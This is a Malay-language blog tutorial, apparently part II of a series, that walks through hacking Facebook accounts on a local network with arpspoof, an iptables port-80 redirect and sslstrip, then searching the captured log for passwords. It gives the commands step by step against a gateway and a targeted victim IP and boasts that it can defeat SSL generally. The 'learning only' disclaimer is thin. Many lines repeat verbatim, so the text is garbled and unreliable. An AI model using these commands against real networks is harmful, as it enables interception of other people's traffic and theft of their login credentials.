Salam dan selamat sejahtera, Ok, kali ini kita akan meneruskan
pembelajaran terdahulu. Setelah artikel bahagian pertama, th3bAdh mengambil
masa yang panjang untuk menyambungkan artikel tersebut kerana terdapat masalah/
hal-hal dunia yang lain, walaubagaimana pun, Seperti yang dijanjikan, th3bAdh akan
menceritakan penggunaan sslsniff bagi menggodam pengguna facebook yang terdapat pada rangkaian sendiri
sahaja . Perhatian ! Segala penerangan dan penulisan disini adalah bagi tujuan
pembelajaran sahaja, dan saya tidak akan bertanggungjawab atas apa yang berlaku
kepada anda. Tak nak cakap membebel-bebel dah, mana yang masih tak tahu, sila
baca artikel bahagian I terlebih dahulu
pembelajaran terdahulu. Setelah artikel bahagian pertama, th3bAdh mengambil
masa yang panjang untuk menyambungkan artikel tersebut kerana terdapat masalah/
hal-hal dunia yang lain, walaubagaimana pun, Seperti yang dijanjikan, th3bAdh akan
menceritakan penggunaan sslsniff bagi menggodam pengguna facebook yang terdapat pada rangkaian sendiri
sahaja . Perhatian ! Segala penerangan dan penulisan disini adalah bagi tujuan
pembelajaran sahaja, dan saya tidak akan bertanggungjawab atas apa yang berlaku
kepada anda. Tak nak cakap membebel-bebel dah, mana yang masih tak tahu, sila
baca artikel bahagian I terlebih dahulu
Langkah : Buka terminal dan taip
echo 1 > /proc/sys/net/ipv4/ip_forward
Taip : arpspoof -i wlan0 –t
arpspoof –i wlan0 192.168.1.5
Penerangan : arpspoof –i wlan0 192.168.1.5
-i :adalah interface anda, sekiranya anda tidak pasti, taip
ifconfig untuk kepastian,
ifconfig untuk kepastian,
192.168.1.5 : adalah alamat IP bagi network gateway,
pastikan alamat gateway anda tepat bagi mengalih data –data trafik, pastikan
ianya betul,(sekiranya tersilap, ianya tidak akan menjadi)
pastikan alamat gateway anda tepat bagi mengalih data –data trafik, pastikan
ianya betul,(sekiranya tersilap, ianya tidak akan menjadi)
Tambahan : sekiranya anda mahu menyerang pada komputer yang
hendak diserang sahaja, tambahkan baris perintah –t sebelum alamat IP gateway,
contoh :
hendak diserang sahaja, tambahkan baris perintah –t sebelum alamat IP gateway,
contoh :
Arpspoof –i wlan0 –t 192.168.1.12 192.168.1.5
Selepas dimasukkan baris perintah diatas, biarkan ianya
berjalan (tidak perlu ditutup)
berjalan (tidak perlu ditutup)
Kita beralih langkah seterusnya, buka terminal baru dan taip
iptables -t nat -A PREROUTING -p tcp –destination-port 80
-j REDIRECT –to-ports 10000
Tanpa perlu menutup terminal tadi, taipkan
python
/pentest/web/sslstrip.py –w ssl
Penerangan selepas baris perintah –w : anda boleh menamakan
apa sahaja nama yang suka, tetapi pastikan ia format text contoh ssl.txt bagi menyimpan output. Sekiranya telah
berjaya, anda boleh membuka file tersebut di dalam folder
/pentest/web/sslstrip.
apa sahaja nama yang suka, tetapi pastikan ia format text contoh ssl.txt bagi menyimpan output. Sekiranya telah
berjaya, anda boleh membuka file tersebut di dalam folder
/pentest/web/sslstrip.
Bagi memudahkan pencarian yang terdapat kata laluan anda
boleh mencari kata (Ctrl+F) taip “pass”
boleh mencari kata (Ctrl+F) taip “pass”
Gambar diatas adalah salah satu akaun facebook yang telah
berjaya digodam di dalam sesebuah rangkaian sendiri, ianya tidak dihadkan untuk
memecah facebook sahaja,ianya boleh digunakan untuk memecah kesemua keselamatan
SSL,
berjaya digodam di dalam sesebuah rangkaian sendiri, ianya tidak dihadkan untuk
memecah facebook sahaja,ianya boleh digunakan untuk memecah kesemua keselamatan
SSL,
Ok itu sahaja lah bagi tutorial kali, bagi tutorial akan
datang th3bAdh akan menulis untuk OS Windows pula (kena tunggu bahagian III),
ada juga ke bagi windows?? Tunggu
bahagian akan datang, jangan ketinggalan…hahahha
datang th3bAdh akan menulis untuk OS Windows pula (kena tunggu bahagian III),
ada juga ke bagi windows?? Tunggu
bahagian akan datang, jangan ketinggalan…hahahha
